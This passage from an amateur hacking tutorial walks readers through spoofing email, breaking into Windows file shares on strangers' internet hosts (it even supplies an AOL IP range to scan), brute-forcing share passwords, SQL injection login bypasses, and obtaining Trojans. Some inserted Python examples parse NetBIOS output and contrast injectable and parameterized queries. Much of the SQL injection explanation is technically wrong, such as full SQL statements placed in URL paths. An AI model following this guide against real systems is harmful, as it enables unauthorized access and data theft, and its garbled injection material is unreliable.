Although what I'm about to say has nothing to do with Telnet, you might be wondering, what if I receive a fake email? How can I tell whether or not it is authentic? Well there is one way, which of course doesn't always work. If you receive an email from your ISP, your ISP will use its own SMTP server to send the mail, meaning if you checked the headers of the email (the Received: lines, which each mail server adds on the way, above anything the sender typed) and it came from another SMTP server, the email would probably be a fake. It is also possible that one of the people you choose to send fake mail to may also have the knowledge to be able to tell if the email is fake; in that case, if you're going to send someone who has a Yahoo email address a fake mail (and you're going to make it look like it came from the Yahoo admins) you would be wanting to send it from their SMTP server, just in case.

NETBIOS/SMB HACKING:

What is NetBIOS/SMB Hacking? On all Windows systems (98 and upwards) there are two services which can be easily exploited; although this is not really hacking, it can grant you access to some very sensitive information. The NetBIOS session service runs at TCP Port 139 (SMB carried over NetBIOS) and on Windows 2000 and later SMB also runs directly at TCP Port 445. By default on Windows machines both these ports are listening. If you have ever used a computer attached to a network you may have noticed you can view remote computers' hard drives on the network. Well the same applies for computers on the Internet, after all the Internet is just one big network. With the launch of Service Pack 2, I would have thought this type of attack would become useless; however, according to reports this is not the case at all. With the launch of Service Pack 2 this type of attack has become a lot more widespread: the Service Pack 2 firewall allows this type of attack to take place. Before, people may have had firewalls to protect them against a remote person viewing their hard drive (instead of disabling anonymous login or taking some sort of action); however most people that have the Service Pack 2 firewall I would think would be unlikely to have another firewall. So how can we exploit the fact that by default Windows allows a person to log in via NetBIOS and have read access to the hard drive? The first tool which we will utilize is one that is built into Windows, and that is NBTSTAT. Open up command prompt and type NBTSTAT and press enter; you should get the following printed to the screen:

------
Displays protocol statistics and current TCP/IP connections using NBT (NetBIOS over TCP/IP).

NBTSTAT [ [-a Remote Name] [-A IP address] [-c] [-n] [-r] [-R] [-RR] [-s] [-S] [interval] ]

  -a   (adapter status)   Lists the remote machine's name table given its name
  -A   (Adapter status)   Lists the remote machine's name table given its IP address.
  -c   (cache)            Lists NBT's cache of remote [machine] names and their IP addresses
  -n   (names)            Lists local NetBIOS names.
  -r   (resolved)         Lists names resolved by broadcast and via WINS
  -R   (Reload)           Purges and reloads the remote cache name table
  -S   (Sessions)         Lists sessions table with the destination IP addresses
  -s   (sessions)         Lists sessions table converting destination IP addresses to computer NETBIOS names.
  -RR  (Release Refresh)  Sends Name Release packets to WINS and then, starts Refresh

  Remote Name   Remote host machine name.
  IP address    Dotted decimal representation of the IP address.
  interval      Redisplays selected statistics, pausing interval seconds between each display. Press Ctrl+C to stop redisplaying statistics.
------

Have a good read of the information printed to the screen so you understand what NBTSTAT can do. The switches that you would be wanting to use are -a and -A. If you read the above paragraph you should know that -a lists the remote machine's NetBIOS name table given its name, i.e. its computer name or its DNS host name (an example of a host name is 128.61.optusnet.net.au), and -A lists the remote computer's NetBIOS name table given its IP Address. Note that this is the name table, not a list of shares: it tells you what the machine is called and which NetBIOS services it has registered, and from that whether it is worth trying for shares. Let's try to get a name table via an IP Address; it doesn't matter whether you use the IP Address or the DNS name, it's really just the same, but for this example I will use an IP Address.

------
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Aelphaeis>NBTSTAT -A 127.0.0.1

Local Area Connection:
Node IpAddress: [10.0.0.9] Scope Id: []

    Host not found.

Local Area Connection 2:
Node IpAddress: [0.0.0.0] Scope Id: []

    Host not found.

C:\Documents and Settings\Aelphaeis>
------
If you got the above, that basically means you're out of luck and the remote host most probably isn't vulnerable (it isn't answering NetBIOS name queries, which NBTSTAT sends to UDP port 137). However, if you get the below then you're in business.

------

NetBIOS Local Name Table

    Name           Type      Status
    -----------------------------------
    ADMIN      <00>  UNIQUE    Registered
    WORKGROUP  <00>  GROUP     Registered
    WORK123    <03>  UNIQUE    Registered
    WORK124    <20>  UNIQUE    Registered
    WORKGROUP  <1E>  GROUP     Registered

------
You're probably wondering what the hexadecimal codes near the Type column mean. Well to be honest I don't remember all of them, but I do remember that <20> is the important one: it means the File Server service is registered on WORK124, so that computer is running the sharing service and may have shares you can connect to. (For reference: <00> UNIQUE is the computer name, <00> GROUP is the workgroup or domain, <03> is the Messenger service and also shows the logged-on user name, and <1E> GROUP is browser elections. A real NBTSTAT -A output is headed "NetBIOS Remote Machine Name Table" and ends with the machine's MAC Address.) Note that WORK124 is the computer's name, not a share name; to see which share names the machine offers, type net view \\IPADDRESSGOESHERE. Now comes the part where we log on to a share. Go to Start, right click on My Computer and go Map Network Drive, pick a drive letter (can be anything), then type the following in the box below: \\IPADDRESSGOESHERE\SHARENAME, for example \\IPADDRESSGOESHERE\WORK124 if WORK124 is a share name the machine showed.
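Reading name tables by eye gets old quickly when you are scanning a range, so here is a small Python parser for the table NBTSTAT prints, with the meaning of each suffix attached. This is an added example, not code from the original text; the SAMPLE output in it is constructed in the format Windows uses for NBTSTAT -A (the machine name, user name and MAC address are made up), and the suffix table covers the common NetBIOS service suffixes only.

```python
"""Parse the name table NBTSTAT -A prints and say what each entry means.

Added example for the NetBIOS/SMB section. SAMPLE is a constructed
NBTSTAT -A output; the suffix meanings are the standard NetBIOS ones.
"""
import re

# (suffix, type) -> which service registered the name. Common ones only.
SUFFIXES = {
    ("00", "UNIQUE"): "Workstation Service (computer name)",
    ("00", "GROUP"): "Workgroup or domain name",
    ("03", "UNIQUE"): "Messenger Service (computer name or logged-on user)",
    ("20", "UNIQUE"): "File Server Service (host is sharing, may have shares)",
    ("1B", "UNIQUE"): "Domain Master Browser",
    ("1C", "GROUP"): "Domain Controllers",
    ("1D", "UNIQUE"): "Master Browser",
    ("1E", "GROUP"): "Browser Service Elections",
}

# One table row: NAME <XX> UNIQUE|GROUP STATUS
_ENTRY = re.compile(r"^\s*(\S+)\s+<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\w+)\s*$")

# Constructed sample in the layout nbtstat -A prints.
SAMPLE = """\
Local Area Connection:
Node IpAddress: [10.0.0.9] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    WORK124        <00>  UNIQUE      Registered
    WORKGROUP      <00>  GROUP       Registered
    WORK124        <03>  UNIQUE      Registered
    WORK124        <20>  UNIQUE      Registered
    WORKGROUP      <1E>  GROUP       Registered
    JSMITH         <03>  UNIQUE      Registered

    MAC Address = 00-0C-29-AB-CD-EF
"""


def parse_name_table(text):
    """Return [(name, suffix, type, status), ...]; [] for 'Host not found.' output."""
    entries = []
    for line in text.splitlines():
        m = _ENTRY.match(line)
        if m:
            name, suffix, ntype, status = m.groups()
            entries.append((name, suffix.upper(), ntype, status))
    return entries


def describe(entries):
    """Attach the service meaning to each entry."""
    return [(n, s, t, SUFFIXES.get((s, t), "unknown suffix")) for n, s, t, _ in entries]


def computer_name(entries):
    for name, suffix, ntype, _ in entries:
        if suffix == "00" and ntype == "UNIQUE":
            return name
    return None


def workgroups(entries):
    return sorted({n for n, s, t, _ in entries if s == "00" and t == "GROUP"})


def file_servers(entries):
    """Names that registered <20>: the server service runs there, so that is the
    host to try shares on. It is the computer name, not a share name; share
    names come from 'net view' against the host (hidden ones end in $)."""
    return [n for n, s, t, st in entries if s == "20" and t == "UNIQUE" and st == "Registered"]


def logged_on_users(entries):
    """<03> UNIQUE names other than the computer name are logged-on user names."""
    host = computer_name(entries)
    return [n for n, s, t, _ in entries if s == "03" and t == "UNIQUE" and n != host]


if __name__ == "__main__":
    found = parse_name_table(SAMPLE)
    for name, suffix, ntype, meaning in describe(found):
        print("%-12s <%s> %-7s %s" % (name, suffix, ntype, meaning))
    print("file servers:", file_servers(found), "users:", logged_on_users(found))
```

Paste the output of a real NBTSTAT -A into `parse_name_table` and `file_servers` gives you the hosts worth a `net view`, while `logged_on_users` pulls out the user name that the <03> entry leaks, which is the obvious first guess for the /USER: switch later on.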

Of course that's just an example, you will have to change the IPADDRESSGOESHERE to a real IP Address and also log on to a share on the remote computer. There is a chance that by using the above technique to log on to the remote share won't work; we can also add a network drive by using CMD. You can use the net use command in Windows to log you on, for example: net use \\IPADDRESS\SHARE

Of course that's just like using the other method; sometimes you may have to log on using an actual username, for example:

net use \\IPADDRESS\SHARE * /USER:ADMINISTRATOR

Possibly unknown to you is the fact that Windows machines by default have hidden shares, yes that's right, shares that won't show up by using NBTSTAT (well at least I think so.) Some default shares are:

ADMIN$ C$ IPC$ PRINT$

Your best bet is probably going to be IPC$, which stands for Inter-Process Communication.

If you wanted to log on to IPC$ you would probably do:

net use \\127.0.0.1\IPC$ * /USER:ADMINISTRATOR

Of course you would replace 127.0.0.1 with the IP Address of the computer you wish to log onto. Go into CMD and play around with net use and other such functions. To get a list of the other functions type net /? and learn about how these work.

Ok so now you know how to view the remote shares of a Windows machine and log on to them, but how would you go about finding computers that have NetBIOS enabled? Well first open up an IP Scanner; if you're a total beginner and for some reason do not have an IP Scanner or know where to get one, you can get one from http://angryziber.com Once you have opened up your IP Scanner, whichever one you have, set it up so it scans for ports 139 (NetBIOS), 445 (SMB), 135 (RPC) and 5000 (UPnP). The reason you would want to scan for 139 and 445 is because they're the services you would be exploiting, and it is worth scanning for the other services because if the machine has RPC and UPnP running it is likely the machine is insecure and would not have taken action to prevent people from logging on to the shares remotely. If you don't have an IP Range to scan here is one, an AOL IP Range! 172.128.0.0 - 172.191.255.255

Now that you know the basics of exploiting the NetBIOS service, let's learn about password cracking! With some NetBIOS shares you may find the admin has applied a password to them; this can be a problem (obviously.) If you try to log in to a NetBIOS share and it seems to have a password you could do:

net use \\127.0.0.1\IPC$ password /USER:ADMIN

Of course it's not really likely that you are going to just know the password of the remote share, and it would take a very long time to guess the password by hand. This is where the help of NAT (NetBIOS Auditing Tool) comes in; I will explain below how to use this tool. NetBIOS hacking can be a handy way of penetrating a system, but by default you are not allowed write access; there are some NetBIOS shares which have passwords, and those do have write access (once you gain access.)
Fortunately for you there is a program that can crack these passwords and it's called NAT (NetBIOS Auditing Tool); using it you can attack protected NetBIOS shares via dictionary brute forcing. Here is a link to download NAT: http://www.securityfocus.com/data/tools/auditing/network/nat10bin.zip The above is hosted by SecurityFocus, so the download should work. Now how do we use NAT? If we drag NAT.exe into CMD and press enter we get the following output:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Aelphaeis>"D:\My Stuff\Applications\Temp Folder\Crackers\NetBIOS Auditing Tool\NAT.EXE"
usage: //D/My Stuff/Applications/Temp Folder/Crackers/NetBIOS Auditing Tool/NAT.EXE [-o filename] [-u userlist] [-p passlist]

C:\Documents and Settings\Aelphaeis>

Or something very similar to that. We can use this tool by doing the following:

NAT.exe -o C:\password.txt -u C:\USERLIST.txt -p C:\PASSLIST.txt

and press enter.

I will now explain what each part of that does. -o C:\password.txt is the output file, once or if the password is cracked the password will be stored inside this file, -u C:\USERLIST.txt is the location of the list of usernames the brute forcer will try, and I shouldn't need to tell you what -p C:\PASSLIST.txt does.

If you wish to create your own username and password lists, do so in a plain text editor; if you use WordPad you will for some reason get all sorts of funny boxes between each of the words.

Although I did explain above briefly about finding vulnerable machines I didn't go into much detail; there is quite an easy way to find computers that have protected NetBIOS shares for you to break into. If you haven't already got Angry IP Scanner download it, just search Google for it, and after you have got Angry IP Scanner download the shares.dll plug-in from the following web page: http://www.angryziber.com/ipscan/plugins/

Another program I thought I should mention is NBTscan; you can use this program for scanning IP Ranges and obtaining name information, and you can download it from: http://www.inetcat.org/software/nbtscan.html You can also download a Unix version if you wish, and the source code for it, although I assume if you're a beginner you will not be chasing after such things. Below are the command arguments the program takes:

NBTscan version 1.5.1.
Copyright (C) 1999-2003 Alla Bezroutchko.
This is free software and it comes with absolutely no warranty.
You can use, distribute and modify it under terms of GNU GPL.

Usage:
nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename)|(<scan_range>)
        -v              verbose output. Print all names received
                        from each host
        -d              dump packets. Print whole packet contents.
        -e              Format output in /etc/hosts format.
        -l              Format output in lmhosts format.
                        Cannot be used with -v, -s or -h options.
        -t timeout      wait timeout milliseconds for response.
                        Default 1000.
        -b bandwidth    Output throttling. Slow down output
                        so that it uses no more that bandwidth bps.
                        Useful on slow links, so that outgoing queries
                        don't get dropped.
        -r              use local port 137 for scans. Win95 boxes
                        respond to this only.
                        You need to be root to use this option on Unix.
        -q              Suppress banners and error messages,
        -s separator    Script-friendly output. Don't print
                        column and record headers, separate fields with separator.
        -h              Print human-readable names for services.
                        Can only be used with -v option.
        -m retransmits  Number of retransmits. Default 0.
        -f filename     Take IP addresses to scan from file filename.
                        -f - makes nbtscan take IP addresses from stdin.
        <scan_range>    what to scan. Can either be single IP
                        like 192.168.1.1 or
                        range of addresses in one of two forms:
                        xxx.xxx.xxx.xxx/xx or xxx.xxx.xxx.xxx-xxx.
Examples:
        nbtscan -r 192.168.1.0/24
                Scans the whole C-class network.
        nbtscan 192.168.1.25-137
                Scans a range from 192.168.1.25 to 192.168.1.137
        nbtscan -v -s : 192.168.1.0/24
                Scans C-class network. Prints results in script-friendly
                format using colon as field separator.
                Produces output like that:
                192.168.0.1:NT_SERVER:00U
                192.168.0.1:MY_DOMAIN:00G
                192.168.0.1:ADMINISTRATOR:03U
                192.168.0.2:OTHER_BOX:00U
                ...
        nbtscan -f iplist
                Scans IP addresses specified in file iplist.

What you would probably want to do is use the command switch -r to scan a Class C IP Range; you should have read what a Class C IP Range was above. An example of the commands you can use to scan a Class C IP Range is:

nbtscan -v -r 202.61.175.0/24

You should also notice I included -v which means verbose, this will make the program send you back more information than usual.
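As an added example (not from the original text), here is a small Python script that parses both layouts shown above, the NBTSTAT -A name table and the nbtscan -s ':' output, and reports which hosts are registering a <20> name, which is the File Server service; that is the check an administrator would run over a scan of their own network to see which machines are advertising file sharing. The sample outputs are constructed from the tables printed above plus one extra constructed nbtscan line.

```python
import re

# What the common NetBIOS name suffixes mean; "U" is a UNIQUE name, "G" a GROUP name.
SUFFIX_MEANING = {
    ("00", "U"): "Workstation service (computer name)",
    ("00", "G"): "domain or workgroup name",
    ("03", "U"): "Messenger service",
    ("20", "U"): "File Server service (host is sharing files)",
    ("1E", "G"): "Browser service elections",
}

# One row of the NBTSTAT -A name table: NAME <hh> UNIQUE|GROUP Registered
NBTSTAT_ROW = re.compile(
    r"^(?P<name>\S+)\s+<(?P<suffix>[0-9A-Fa-f]{2})>\s+(?P<kind>UNIQUE|GROUP)\s+Registered"
)
# One row of "nbtscan -s :" output: ip:name:hhU  or  ip:name:hhG
NBTSCAN_ROW = re.compile(
    r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<name>[^:]+):(?P<suffix>[0-9A-Fa-f]{2})(?P<kind>[UG])$"
)

# Constructed sample: the name table printed above, attributed to 127.0.0.1.
NBTSTAT_SAMPLE = """\
NetBIOS Local Name Table

Name               Type         Status
---------------------------------------------
ADMIN        <00>  UNIQUE      Registered
WORKGROUP    <00>  GROUP       Registered
WORK123      <03>  UNIQUE      Registered
WORK124      <20>  UNIQUE      Registered
WORKGROUP    <1E>  GROUP       Registered
"""

# Constructed sample: the nbtscan -s ':' lines from the usage text, plus one
# made-up host (192.168.0.2) that also registers a <20> name.
NBTSCAN_SAMPLE = """\
192.168.0.1:NT_SERVER:00U
192.168.0.1:MY_DOMAIN:00G
192.168.0.1:ADMINISTRATOR:03U
192.168.0.2:OTHER_BOX:00U
192.168.0.2:OTHER_BOX:20U
"""


def parse_nbtstat(text, host):
    """Return (host, name, suffix, kind) tuples from an NBTSTAT -A name table."""
    entries = []
    for line in text.splitlines():
        m = NBTSTAT_ROW.match(line.strip())
        if m:
            entries.append((host, m["name"], m["suffix"].upper(), m["kind"][0]))
    return entries


def parse_nbtscan(text):
    """Return (host, name, suffix, kind) tuples from 'nbtscan -s :' output."""
    entries = []
    for line in text.splitlines():
        m = NBTSCAN_ROW.match(line.strip())
        if m:
            entries.append((m["ip"], m["name"].strip(), m["suffix"].upper(), m["kind"]))
    return entries


def describe(entries):
    """Attach a human-readable meaning to every suffix, 'unknown suffix' if not in the table."""
    return [(host, name, suffix, SUFFIX_MEANING.get((suffix, kind), "unknown suffix"))
            for host, name, suffix, kind in entries]


def file_sharing_hosts(entries):
    """Hosts registering a UNIQUE <20> name, i.e. running the File Server service."""
    return sorted({host for host, _name, suffix, kind in entries
                   if suffix == "20" and kind == "U"})


if __name__ == "__main__":
    for host, name, suffix, meaning in describe(parse_nbtstat(NBTSTAT_SAMPLE, "127.0.0.1")):
        print(f"{host:15} {name:15} <{suffix}> {meaning}")
    print("sharing files:", file_sharing_hosts(parse_nbtscan(NBTSCAN_SAMPLE)))
```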

STRUCTURED QUERY LANGUAGE:

So what is SQL (Structured Query Language)? Well SQL is a language that is used with web based database programs; any forum you have ever talked on uses SQL, and if you log in to check your email the website is also using SQL to access the database. It is important you learn SQL; the reasons why will become apparent later on. Let's start learning some SQL shall we? SQL, as I told you earlier, is a database language; in an SQL database there are tables and columns and such. Below is an example of what a table in an SQL database would look like.

Hardware
------------
IBM     Mac
------------
1899    897
1766    5213
1600    213
1233    123

We have the table name, Hardware, and the two columns IBM and Mac; remember this is just an example. Now let's learn how to use the two most basic SQL commands, SELECT and FROM. Example:

SELECT IBM, Mac FROM Hardware

What would the example do? Well it would select both columns IBM and Mac from the table with the name Hardware. Now before I get into anything more complicated I would like to explain what the wildcard is and how to use it. I would assume you know what a wildcard is; well to my understanding a wildcard means anything. If you were playing a game and you got a wildcard, that would mean it would be equal to any card, well something like that, let's not go too far off topic now. What if there were hundreds of columns in the table Hardware, would we have to type each column out? No we wouldn't, we could just use a wildcard. Example:

SELECT * FROM Hardware

You're probably thinking, well this is cool and all, but what if I wanted to select something specific, I mean something whose value is less than 1000? Well using the WHERE clause you can! Example:

SELECT IBM FROM Hardware WHERE IBM < 1000

This of course would select the column IBM in the table Hardware and would return everything in that column which has a value of less than 1000. How would we go about using other operators? Below is a list of operators:

<    Less than
>    Greater than
=    Equal to
<=   Less than or equal to
>=   Greater than or equal to
!<   Not less than
!>   Not greater than
<>   Not equal to
!=   Not equal to

In case you're wondering, both <> and != mean Not equal to; supposedly you have to use different ones for different database software. Let's just look at another example:

SELECT IBM FROM Hardware WHERE IBM != 1899

This of course would select the column IBM from the table Hardware and would select all the things in that column except 1899. Now that you know the basic operators, it is time to learn about the BETWEEN operator. Look at the below example:

SELECT IBM FROM Hardware WHERE IBM BETWEEN 1000 AND 2000

If you know the basics of the English language you should be able to see what that does, it selects the column IBM from the table Hardware then selects all the information in the column that has a value between 1000 and 2000.

Drinks
------------------
Price   Drink
------------------
1       Coke
2       Large Coke
3       XL Coke

Look at the above example of a table; now it is time to learn about the AND command in SQL. What if we wanted to select rows based on more than one condition, across one or more columns? Well this is where the AND command comes in handy.

SELECT * FROM Drinks WHERE Drink = 'Coke' AND Price = '1'

Look at the above statement; it is easy to see what it does, it selects the rows where both conditions are true, one on each column. Now that you know how to use the AND statement, we are going to learn about OR and LIKE. Let's start off with the OR statement/clause or whatever you want to call it.

SELECT * FROM Drinks WHERE Price = '1' OR Price = '2'

It should be obvious to you what the above does: it selects every row where Price = 1 or Price = 2. SQL uses a lot of English words, therefore it is very easy to understand. Now it is time to learn to use the LIKE statement, which is a tiny bit more complicated than the others.

SELECT * FROM Drinks WHERE Drink LIKE 'XL*'

This would select the rows whose Drink column contains data that begins with XL; if you look up you will notice the Drink column contains XL Coke, and XL is the first part of XL Coke, therefore using the above statement you could retrieve stuff from the Drink column that began with XL. What if we want to find something that just contains XL (XL might not be at the front)? Well we would do:

SELECT * FROM Drinks WHERE Drink LIKE '*XL*'

Notice the * is on either side of XL? So now you know how to grab some stuff from an SQL database, which is pretty cool, and I'm sure when you're testing the security of a web based application that uses SQL it will come in handy. Of course, it would also be handy to know how to store something inside an SQL database. Let's try inserting some data into the Drinks table.

INSERT INTO Drinks (Drink, Price) VALUES ('Mountain Dew', 4)

So basically we insert a new drink, as well as the number 4, which is placed into the Price column adjacent to the Drink column. What if we wanted to edit or update something stored in a table? Well, you would do the following:

UPDATE Drinks SET Price = 3 WHERE Drink = 'Mountain Dew'

So now you know how to read information from a table and even write to it, but of course if you're a malicious hacker you will be wanting to delete some stuff as well (I don't encourage it.) Let's say you hated Mountain Dew:

DELETE FROM Drinks WHERE Drink = 'Mountain Dew'

Yay! Mountain Dew is no more!

What if we wanted to delete everything in the table? Well that's very simple and the chances are you would be able to work it out yourself.

DELETE FROM Drinks

Simple as that! There are some things I didn't mention during this part of the text; first I didn't mention that with some SQL database software you need to put a semicolon at the end of each statement, example:

DELETE FROM Drinks WHERE Drink = 'Mountain Dew';

Also, with some database software, when using the LIKE statement you have to do:

LIKE '%XL%'

Instead of the usual:

LIKE '*XL*'

That's basically it, now you know the very basics of SQL! Why you needed to learn this, will probably become apparent later on.
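To see these statements actually run, here is an added Python example (not from the original text) that loads the Hardware and Drinks tables printed above into an in-memory SQLite database and executes the queries from this section; it also shows the LIKE caveat concretely, since SQLite is one of the databases that wants % rather than * as its wildcard.

```python
import sqlite3


def build_db():
    """Create the two example tables from the text in a throwaway in-memory database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Hardware (IBM INTEGER, Mac INTEGER)")
    conn.executemany("INSERT INTO Hardware (IBM, Mac) VALUES (?, ?)",
                     [(1899, 897), (1766, 5213), (1600, 213), (1233, 123)])
    conn.execute("CREATE TABLE Drinks (Price INTEGER, Drink TEXT)")
    conn.executemany("INSERT INTO Drinks (Price, Drink) VALUES (?, ?)",
                     [(1, "Coke"), (2, "Large Coke"), (3, "XL Coke")])
    conn.commit()
    return conn


def query(conn, sql):
    """Run one SELECT and return its rows as a list of tuples."""
    return conn.execute(sql).fetchall()


def demo_selects(conn):
    """The SELECT statements from the text, keyed by what each one demonstrates."""
    return {
        "all_columns": query(conn, "SELECT * FROM Hardware"),
        "less_than": query(conn, "SELECT IBM FROM Hardware WHERE IBM < 1000"),
        "not_equal": query(conn, "SELECT IBM FROM Hardware WHERE IBM != 1899"),
        "between": query(conn, "SELECT IBM FROM Hardware WHERE IBM BETWEEN 1000 AND 2000"),
        "and": query(conn, "SELECT * FROM Drinks WHERE Drink = 'Coke' AND Price = '1'"),
        "or": query(conn, "SELECT * FROM Drinks WHERE Price = '1' OR Price = '2'"),
        # SQLite treats * in a LIKE pattern as a literal asterisk, so this matches nothing...
        "like_star": query(conn, "SELECT * FROM Drinks WHERE Drink LIKE '*XL*'"),
        # ...and % is the wildcard that actually works here.
        "like_percent": query(conn, "SELECT * FROM Drinks WHERE Drink LIKE '%XL%'"),
    }


def demo_modify(conn):
    """INSERT, UPDATE and DELETE from the text; returns what each step left behind."""
    conn.execute("INSERT INTO Drinks (Drink, Price) VALUES ('Mountain Dew', 4)")
    after_insert = query(conn, "SELECT Price, Drink FROM Drinks WHERE Drink = 'Mountain Dew'")
    conn.execute("UPDATE Drinks SET Price = 3 WHERE Drink = 'Mountain Dew'")
    after_update = query(conn, "SELECT Price FROM Drinks WHERE Drink = 'Mountain Dew'")
    conn.execute("DELETE FROM Drinks WHERE Drink = 'Mountain Dew'")
    rows_left = query(conn, "SELECT COUNT(*) FROM Drinks")[0][0]
    conn.execute("DELETE FROM Drinks")  # empties the table, but the table itself stays
    rows_after_wipe = query(conn, "SELECT COUNT(*) FROM Drinks")[0][0]
    return after_insert, after_update, rows_left, rows_after_wipe


if __name__ == "__main__":
    db = build_db()
    for label, rows in demo_selects(db).items():
        print(f"{label:13} -> {rows}")
    print(demo_modify(db))
```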

SQL INJECTION:

If you have read the section in this text about SQL then you should now know the basics of the SQL language; a lot of web based software and websites use SQL, which is why it is important to learn it. SQL Injection is a very common exploit used by hackers: a server can be fully patched, running all the latest software along with a firewall, and a hacker can still gain access via SQL Injection, which is why it is so important to learn about it. This is only a short tutorial on SQL Injection, so don't expect too much; maybe I'll write a separate full guide to SQL Injection in the future.

What Is SQL Injection:

Many websites and web based software take input from users; it is possible to send carefully crafted information as input, injecting extra characters or special commands, in order for a hacker to gain access to something he or she is not usually allowed access to, such as a database of passwords.

What is Vulnerable:

What is vulnerable? Well this is hard to say; generally what you would be looking for are pages where a user would log in. Pages that end in /login.php or /login.asp would probably be what you would be looking for. Web based software such as forums is particularly vulnerable to SQL Injection; forum software usually allows each user of the forum to log in (if this isn't the case, then what kind of forum is it?) You usually have a username and password box where the user types his username and password for the forum. Surprisingly, most SQL Injection vulnerabilities in forum software don't actually have anything to do with incorrect input from the login page.

The Injection:

Let's say you use a web based email service called Hello Email; this is just an example of course. You go to log in, and after you have entered your username and password you have access to your email. Generally if you were to use Hello Email the query that would be sent to the SQL database would be:

SELECT * FROM users WHERE user = '[email protected]' AND password = 'bba3d6634ded1a7e8b10cbc715330cb7'

That's just an example; what that would do is first check if the email was correct, then check if the password you entered (which was converted to an MD5 hash) was the same as the one stored inside the SQL database. If "user" and "password" both evaluated to true, then it would allow you access to your web based email. The key thing I said above, that you should take note of, is "if "user" and "password" evaluated to true".

It is possible to make an SQL statement return true by using some extra parameters. Let's try some injection (you're going to have to use your imagination):

http://helloemail.com/login.asp%20SELECT%20*%20FROM%20users%20WHERE%20user%20=%20'[email protected]'%20AND%20password%20=%20'bba3d6634ded1a7e8b10cbc715330cb7'%20OR%201=1'

It is possible, if the above exploit was used in a real life situation, that it would work; why is that though? You should have noticed two things. First, that between each word is %20; you're probably wondering what that is for, well %20 basically means a space between each word. Second, at the end of the whole statement you should have noticed "OR 1=1"; as you probably know, 1 does equal 1, meaning the SQL statement evaluates to true, meaning it is possible you could get access to some sensitive information.

There are other things except for 1=1 that you can use, such as x=x or a=a. Try making some up by yourself.

What is another query we could use to try and trick the database into spitting out some sensitive information?

http://helloemail.com/login.asp%20SELECT%20*%20FROM%20users%20WHERE%20user%20=%20'[email protected]'%20AND%20password%20=%20'bba3d6634ded1a7e8b10cbc715330cb7'%20OR%201=1--'

You should notice on the end of the query is "--"; because we put that on the end of the query, when the query was processed anything after it was not processed, meaning that because the statement is not checked properly we may gain access to something sensitive.

When attempting SQL Injection you must always put a single quote before and after the piece of information you wish to send, because that is how the database software tells where the end of that piece of information is, which of course is important to note, and if you haven't already guessed, it is possible to exploit that.

Let's say we were going to try the following Injection, and the following information is stored in the database:

Emails
------------------
User        Pass
------------------
Aelphaeis   secret

If we were to try the following:

http://helloemail.com/login.asp%20SELECT%20*%20FROM%20Emails%20WHERE%20User%20=%20'Aelphaeis'%20AND%20password%20=%20'secret'

That would most probably log us in as User Aelphaeis because we had the username and password correct.

Suppose we were to try the following command (I won't bother with a URL):

SELECT * FROM Emails WHERE User = Ael'phaeis AND Pass = 'secret'

The database would probably spit out some error like:

Server Error: Incorrect Syntax near 'phaeis'

It thought we were requesting User phaeis instead of Aelphaeis.

Let's say we wanted to gain access to something but we only knew part of the password; we could possibly use the following command:

SELECT * FROM Emails WHERE User = 'Aelphaeis' AND Pass =';

This would select the user Aelphaeis from the database and give a password; however the password would not contain anything, and after it would be a semicolon, which tells the database that that is the end of the statement, so possibly the password would NOT be checked!

So an exploit URL could be:

http://helloemail.com/login.php%20SELECT%20*%20FROM%20Emails%20WHERE%20User%20=%20'Aelphaeis'%20AND%20Pass%20=%20';--
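As an added example (not from the original text), the Python below builds the Hello Email login query exactly the way this section describes, by pasting user input into the SQL string, and puts a parameterized version beside it so the difference can be seen on the same database; the users table, the account name and its password are constructed here. Since the password is run through MD5 before it reaches the query, it is the username field that shows both the OR 1=1-- row match and the Ael'phaeis syntax error discussed above.

```python
import hashlib
import sqlite3

# Constructed account for the imaginary Hello Email service.
DEMO_USER = "aelphaeis@helloemail.com"
DEMO_PASSWORD = "secret"


def md5_hex(text):
    """Hex MD5 digest, the way the text says the password is stored."""
    return hashlib.md5(text.encode()).hexdigest()


def build_users_db():
    """In-memory users table holding one account, password stored as an MD5 hex digest."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT, password TEXT)")
    conn.execute("INSERT INTO users (user, password) VALUES (?, ?)",
                 (DEMO_USER, md5_hex(DEMO_PASSWORD)))
    conn.commit()
    return conn


def login_vulnerable(conn, user, password):
    """The query from the text, assembled by string concatenation.

    Whatever the user typed becomes part of the SQL, so a quote in the
    username changes the structure of the statement instead of being data.
    """
    sql = ("SELECT * FROM users WHERE user = '" + user
           + "' AND password = '" + md5_hex(password) + "'")
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, user, password):
    """Same check with placeholders: the driver keeps the values out of the SQL text."""
    sql = "SELECT * FROM users WHERE user = ? AND password = ?"
    return conn.execute(sql, (user, md5_hex(password))).fetchone() is not None


def query_breaks_on_quote(conn, user):
    """True if the concatenated query fails to parse, the 'Incorrect Syntax' case above."""
    try:
        login_vulnerable(conn, user, "whatever")
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    db = build_users_db()
    print("valid credentials       :", login_vulnerable(db, DEMO_USER, DEMO_PASSWORD))
    print("' OR 1=1-- (vulnerable) :", login_vulnerable(db, "' OR 1=1--", "x"))
    print("' OR 1=1-- (safe)       :", login_safe(db, "' OR 1=1--", "x"))
    print("Ael'phaeis breaks query :", query_breaks_on_quote(db, "Ael'phaeis"))
```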

TROJANS:

I'm sure you know what a Trojan is; if not, search Google for "what is a Trojan" and after reading a bit about Trojans continue reading the rest of my text. If you have never used a Trojan before and have not started coding one, I suggest you play around with a couple that other people have coded; many people will call you a script kiddie for using them but you can learn a bit from using them, remember I said a bit, meaning fuck all really, but nonetheless you should learn a bit. Now download a Trojan from somewhere; if you don't know where to get one you can download one from Cruel-Intentionz.net or EvilEyeSoftware.com. If you didn't know what a Trojan was I asked you to search Google and find out, so you should have; now open up your Edit Server or Build Server. There should be lots of boxes where you can put information; I'll list below what each one means so you can fill them in. Remember though, not all the things listed below will be in the Trojan you're using, and some things in the Trojan may not be listed below.

